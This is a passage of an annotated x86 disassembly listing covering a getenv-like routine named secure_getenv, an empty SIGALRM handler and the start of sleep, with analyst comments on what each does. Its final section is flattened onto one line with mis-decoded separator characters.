; does not describe what this code does; it behaves like an ordinary getenv.
; Do not rely on the name when reasoning about the resolver's handling of
; environment variables (callers listed: init_services_resolv).
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
                push ebp
                mov ebp, esp
                push edi
                push esi
                push ebx
                mov esi, [ebp+arg_0]
                ; edi = strlen(arg_0)
                xor al, al
                mov edi, esi
                cld
                mov ecx, 0FFFFFFFFh
                repne scasb
                mov eax, ecx
                not eax
                lea edi, [eax-1]
                ; ebx walks the environment pointer array until a NULL entry
                mov ebx, __environ
                cmp dword ptr [ebx], 0
                jz short loc_80556B8
                nop

loc_8055690:                            ; CODE XREF: secure_getenv+4Ej
                ; strncmp(entry, name, len)
                push edi
                push esi
                mov eax, [ebx]
                push eax
                call strncmp
                add esp, 0Ch
                test eax, eax
                jnz short loc_80556B0
                ; prefix matched: the next byte must be '=' (3Dh)
                mov eax, [ebx]
                cmp byte ptr [edi+eax], 3Dh
                jnz short loc_80556B0
                ; return entry + len + 1, the start of the value
                lea eax, [edi+1]
                add eax, [ebx]
                jmp short loc_80556BA
; ---------------------------------------------------------------------------

loc_80556B0:                            ; CODE XREF: secure_getenv+37j
                                        ; secure_getenv+3Fj
                add ebx, 4
                cmp dword ptr [ebx], 0
                jnz short loc_8055690

loc_80556B8:                            ; CODE XREF: secure_getenv+25j
                ; not found
                xor eax, eax

loc_80556BA:                            ; CODE XREF: secure_getenv+46j
                lea esp, [ebp+var_C]
                pop ebx
                pop esi
                pop edi
                mov esp, ebp
                pop ebp
                retn
secure_getenv endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_80556C4()
;   Empty function: sets up and tears down a frame, nothing else. Its only
;   reference is a data reference from sleep, which stores its address in the
;   structure passed to sigaction for signal 0Eh.
;   NOTE(review): 0Eh is SIGALRM in Linux numbering, so this is presumably the
;   do-nothing alarm handler sleep installs - confirm.
sub_80556C4 proc near                   ; DATA XREF: sleep+3Do
                push ebp
                mov ebp, esp
                mov esp, ebp
                pop ebp
                retn
sub_80556C4 endp

; ---------------------------------------------------------------------------
                align 4

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
sleep proc near                         ; CODE XREF: main+48Ap main+9C9p ...
var_3C = byte ptr -3Ch var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = byte ptr -28h var_24 = dword ptr -24h var_20 = byte ptr -20h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 30h push edi push esi push ebx mov edi, [ebp+arg_0] mov ecx, __errno mov [ebp+var_30], ecx test edi, edi jnz short loc_80556EC xor eax, eax jmp loc_80557DD ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_80556EC: ; CODE XREF: sleep+17j mov [ebp+var_24], 2000h lea eax, [ebp+var_28] push eax lea eax, [ebp+var_24] push eax push 0 call sigprocmask add esp, 0Ch test eax, eax jl short loc_8055734 mov [ebp+var_10], offset sub_80556C4 mov [ebp+var_C], 0 mov [ebp+var_8], 0 lea eax, [ebp+var_20] push eax lea eax, [ebp+var_10] push eax push 0Eh call sigaction add esp, 0Ch test eax, eax jge short loc_805573C loc_8055734: ; CODE XREF: sleep+3Bj mov eax, edi jmp loc_80557DD ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳